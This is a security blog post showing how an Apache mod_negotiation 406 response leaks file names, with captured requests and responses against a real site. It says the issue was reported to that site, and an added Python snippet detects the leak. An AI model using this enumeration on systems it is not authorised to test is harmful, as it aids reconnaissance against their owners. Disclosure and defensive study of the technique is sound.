Apache mod_negotiation filename bruteforcing (file-name buster) vulnerability with LIVE example
Hey Ya Geeks,
I am Praveen Nair from Team Kerala Cyber Squad - India.
Today I am going to share a less-known file-name bruteforcing (file-name buster) attack on the Apache server. Even though its risk level is low, I found it interesting, so I thought of sharing it with you all. Let's get into it without wasting much time :)
[+] THINGS YOU GONNA NEED
#>> A TOOL TO INTERCEPT THE HEADER REQUEST AND RESPONSE (LIKE BURP, LIVE HTTP HEADERS, ETC.)
#>> IMPORTANT THINGS >> GOOD EYES TO WATCH OUT FOR THE HOLES. :D
#>> BRAIN TOO :p
[+] TARGET = Pocket's main domain, i.e. http://getpocket.com/
[+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability
#>> RISK :- INFORMATION DISCLOSURE ( LOW )
#>> WHAT ACTUALLY IS THIS ATTACK??? \0_0/
mod_negotiation is an Apache module responsible for selecting, from several available documents, the one that best matches the client's capabilities. If the client provides an Accept header that none of the available variants can satisfy, the server responds with a 406 Not Acceptable error containing a pseudo directory listing. This behaviour helps an attacker learn more about the target: for example, generate a list of base names, generate a list of interesting extensions, look for backup files, and so on.
MultiViews is an Apache option which acts with the following rule:
If the server receives a request for /some/dir/foo, /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings they would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.
#>> HOW TO ATTACK / VERIFICATION AND REPRODUCTION?? :N
The selection depends on several Accept* headers in the client request:
Accept
Accept-Language
Accept-Encoding
So, let's see how it actually works:
Turn on the interceptor tool and stay connected.
Suppose an attacker requests "index" without any extension through an HTTP request:
All he has to do is type http://site.com/index in the address bar and press enter (here our target is http://getpocket.com/). Let's see what we get in the request header.
#>> HTTP Header Request :-
GET http://getpocket.com/index HTTP/1.1
Host: getpocket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Here focus on the "Accept" header with the value "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8". Because it ends with the wildcard */*, this is an "Accept:" header with an existent MIME type (*/*): whatever the server has on disk can satisfy it.
#>> HTTP Header Response :-
HTTP/1.1 200 OK
Content-Location: index.php
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Oct 2013 18:10:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"
Server: Apache
Set-Cookie: sess_guid=by5A1g73dR504Tb2fup4e11phRT8d332f40B54F617tjt7a56416dma8rd7WU171; expires=Sat, 30-Sep-2028 18:10:48 GMT; path=/; domain=getpocket.com
Set-Cookie: sess_start_time=1380910248; path=/; domain=.getpocket.com
TCN: choice
Vary: negotiate
x-frame-options: SAMEORIGIN
Transfer-Encoding: chunked
Connection: keep-alive
Now, notice that the server response carries several interesting headers:
Content-Location: index.php
Vary: negotiate
TCN: choice
This means MultiViews is enabled on the / directory, since the server automatically selected the file index.php.
Now let's see what happens if in the request we use an "Accept:" header with a nonexistent MIME type (test/hell):
#>> HTTP Header Request :-
GET http://getpocket.com/index HTTP/1.1
Host: getpocket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
Accept: test/hell
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
#>> HTTP Header Response :-
HTTP/1.1 406 Not Acceptable
Alternates: {"index.php" 1 {type text/html}}
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 04 Oct 2013 18:23:33 GMT
Server: Apache
TCN: list
Vary: negotiate
Content-Length: 410
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /index could not be found on this server.</p>
Available variants:
<ul>
<li><a href="index.php">index.php</a> , type text/html</li>
</ul>
<hr>
<address>Apache Server at getpocket.com Port 80</address>
</body></html>
Woo! With a single request we get a listing of all the files! ;)
Well, yeah. Not really *all* the files, but every file with the same base name as the one requested and an extension listed in the mime-types file.
This means that if any index.whatever exists on the server, it will be listed.
Similarly, the attacker can use any file name in place of "index", so the end result is file-name bruteforcing through mod_negotiation, an Apache module.
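As a defender-side check added here (not part of the original post), this Python parses a raw Apache response like the ones captured above and reports whether negotiation is active, which file was chosen, and which variant names a 406 discloses. The two samples are constructed from the captured responses; the extra "index.bak" entry is made up to show multi-variant parsing.

```python
import re
# Constructed sample based on the 406 response captured above; the second
# Alternates entry ("index.bak") is constructed to exercise multi-variant parsing.
SAMPLE_406 = (
    "HTTP/1.1 406 Not Acceptable\r\n"
    'Alternates: {"index.php" 1 {type text/html}}, '
    '{"index.bak" 1 {type application/octet-stream}}\r\n'
    "Server: Apache\r\nTCN: list\r\nVary: negotiate\r\n\r\n"
    "<html><body>Available variants:<ul>\n"
    '<li><a href="index.php">index.php</a> , type text/html</li>\n'
    '<li><a href="index.bak">index.bak</a> , type application/octet-stream</li>\n'
    "</ul></body></html>"
)
# Constructed sample based on the 200 response captured above (headers trimmed).
SAMPLE_200 = (
    "HTTP/1.1 200 OK\r\nContent-Location: index.php\r\nServer: Apache\r\n"
    "TCN: choice\r\nVary: negotiate\r\n\r\n<html>...</html>"
)

def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(lines[0].split()[1]), headers, body

def parse_alternates(value):
    """Parse an RFC 2295 Alternates header into [(filename, media type)]."""
    variants = []
    for name, attrs in re.findall(r'\{"([^"]+)"\s+[0-9.]+((?:\s*\{[^{}]*\})*)\s*\}', value):
        mtype = re.search(r"\{type\s+([^}\s]+)\}", attrs)
        variants.append((name, mtype.group(1) if mtype else ""))
    return variants

def assess(raw):
    """Report negotiation state, the chosen file, and any variant names a 406 leaks."""
    status, headers, body = parse_response(raw)
    variants = parse_alternates(headers.get("alternates", ""))
    if status == 406 and not variants:  # no Alternates header: fall back to the HTML list
        variants = [(n, "") for n in re.findall(r'<li><a href="([^"]+)">', body)]
    # Mitigation (not from the post): "Options -MultiViews" in the Apache config turns this off.
    return {
        "negotiation": "negotiate" in headers.get("vary", "").lower() or "tcn" in headers,
        "tcn": headers.get("tcn", ""),
        "chosen": headers.get("content-location", ""),
        "variants": [n for n, _ in variants],
    }
```

Run it against your own server's 406 response for a bare base name: a non-empty "variants" list means MultiViews is enumerating files for anyone who asks.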
Hope this tut was a little bit informative to you all. :)
[+] This vulnerability was reported to the GetPocket Security Team, and as a result they rewarded me by adding my name to their Hall of Fame.
Thanks for having a look at this post. :)
Please leave your comments below.
Praveen Nair ( c0d3 c0m4dr3 404 )
Team - Kerala Cyber Squad - India
./xit n 0ut